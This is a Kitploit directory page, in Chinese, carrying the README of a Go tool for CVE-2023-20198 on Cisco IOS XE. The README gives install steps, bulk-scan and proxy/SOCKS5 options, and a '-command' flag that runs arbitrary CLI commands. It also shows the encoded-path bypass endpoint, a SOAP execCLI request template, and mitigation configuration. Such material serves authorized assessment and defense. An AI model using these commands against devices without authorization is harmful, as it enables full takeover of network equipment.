Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cisco-cve-2023-20198-checker — 基于Go的漏洞扫描器,用于检测Cisco IOS XE设备中的CVE-2023-20198。测试SOAP/XML接口(WSMA)的远程代码执行,具备批量扫描和HTML报告生成功能。 | Kitploit
工具/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
漏洞扫描器漏洞利用Web应用程序漏洞利用网络安全渗透测试命令与控制
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

基于Go的漏洞扫描器,用于检测Cisco IOS XE设备中的CVE-2023-20198。测试SOAP/XML接口(WSMA)的远程代码执行,具备批量扫描和HTML报告生成功能。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
96个月前尚未审核
分享

Cisco CVE-2023-20198 检查器

Go Version License Platform

用于检测 Cisco IOS XE 设备中 CVE-2023-20198 的专业漏洞扫描器。测试易受攻击的 SOAP/XML 接口 (WSMA)。专为授权安全评估和网络审计设计。

⚠️ 法律免责声明

仅限授权安全测试

本工具仅允许用于:

  • 授权漏洞扫描
  • 具有明确书面同意的安全审计
  • 网络安全评估
  • 受控实验室环境中的教育目的
  • 合规性和渗透测试

未经授权访问计算机系统是违法的。请务必在测试任何系统之前获得适当授权。


🚀 快速开始

安装

使用 go install(推荐)

go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

二进制文件将安装到你的 $GOPATH/bin 目录(通常是 ~/go/bin)。

手动安装

# 克隆仓库
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# 构建
go build -o cisco-cve-2023-20198-checker

# 安装(可选)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

基本用法

# 检查单个目标
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# 检查多个目标
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# 生成 HTML 报告
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 功能特性

  • ✅ 漏洞检测 - 检测 CVE-2023-20198 (WSMA RCE)
  • ✅ 支持单个和批量目标扫描
  • ✅ 自定义端口支持(默认:443)
  • ✅ 通过 SOAP/XML 执行命令
  • ✅ 专业 HTML 报告生成
  • ✅ 零外部依赖
  • ✅ 跨平台(Linux、macOS、Windows)
  • ✅ SSL/TLS 证书跳过选项
  • ✅ 可配置超时
  • ✅ 代理支持(HTTP、HTTPS、SOCKS5)
  • ✅ 认证代理
  • ✅ 环境变量支持(HTTP_PROXY、HTTPS_PROXY)

🌐 代理支持

非常适合企业环境!支持:

  • HTTP/HTTPS 代理
  • SOCKS5 代理(SSH 隧道、Tor)
  • 认证代理
  • 环境变量
# HTTP 代理
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5(SSH 隧道)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# 环境变量
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

详细代理配置请参见 PROXY_GUIDE.md。


💻 命令行选项

标志类型默认值描述
-targetstring-单个目标 IP/主机名
-targets-filestring-包含目标的文件(每行一个)
-portint443HTTPS/SOAP 端口
-usernamestringadminSOAP 用户名
-passwordstring-必需。SOAP 密码
-commandstringuname -a要执行的命令
-htmlboolfalse生成 HTML 报告
-timeoutint10请求超时(秒)
-skip-verifybooltrue跳过 SSL 验证
-proxystring-代理 URL(http://、https://、socks5://)

📖 使用示例

单个目标测试

# 基本漏洞检查
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# 自定义端口
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# 执行特定命令
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# 生成报告
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

批量测试

# 创建目标文件
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# 测试所有目标
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# 批量生成 HTML 报告
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

高级命令

# 网络枚举
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# 版本检测
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# 通过 HTTP 代理
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# 通过 SOCKS5 代理(SSH 隧道)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# 认证代理
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 关于 CVE-2023-20198

漏洞详情

CVE ID: CVE-2023-20198
CVSS 评分: 10.0(严重)
类型: 远程代码执行 (RCE)
影响: Cisco IOS XE Web UI (WSMA)

技术细节

  • 端点: /%2577ebui_wsma_https(路径编码绕过)
  • 协议: 基于 HTTPS 的 SOAP 1.1
  • 认证: WS-Security UsernameToken(需要有效凭据)
  • 命名空间: urn:cisco:wsma-exec
  • 影响: 拥有有效凭据即可完全控制设备

SOAP 请求结构

<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ 缓解措施

针对系统管理员

如果你的设备存在漏洞:

1. 禁用 WSMA(如果不需要)

no ip http server
no ip http secure-server

2. 使用 ACL 限制访问

ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. 更新固件 - 应用最新的 Cisco 安全补丁

4. 启用强认证

aaa new-model
aaa authentication login default group tacacs+ local

5. 监控日志 - 检查可疑的 SOAP/HTTP 活动


🏗️ 从源码构建

前置要求

  • Go 1.21 或更高版本

构建

# 标准构建
go build -o cisco-cve-2023-20198-checker

# 优化(更小的二进制文件)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# 交叉编译到不同平台
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 输出示例

终端输出

╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML 安全检查器                             ║
║     仅限教育和授权安全评估                                ║
╚═══════════════════════════════════════════════════════════╝

[*] 命令: show version
[*] 端口: 443
[*] 超时: 10 秒

[1/1] 测试目标: 192.168.1.100:443
[*] 发送 SOAP 请求...
[+] 收到响应 (状态: 200)
[+] 成功!

╔═══════════════════════════════════════════════════════════╗
║                    批量结果                               ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - 成功
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      摘要                                 ║
╚═══════════════════════════════════════════════════════════╝
总目标数: 1
成功: 1
失败: 0

HTML 报告

专业安全评估报告,包含:

  • 统计面板
  • 详细配置
  • 命令输出(终端样式)
  • 技术元数据
  • 法律免责声明

🤝 贡献

欢迎贡献!请:

  1. 复刻仓库
  2. 创建特性分支
  3. 进行你的更改
  4. 提交拉取请求

📝 许可证

MIT 许可证 - 参见 LICENSE 文件


🔗 参考资料

  • Cisco 安全公告
  • CVE-2023-20198 详情
  • OWASP API 安全

⚖️ 负责任的披露

本工具仅用于授权漏洞扫描。作者不对滥用行为负责。在测试不属于你的系统之前,请务必获得书面许可。


为安全社区而制作 🛡️

下载工具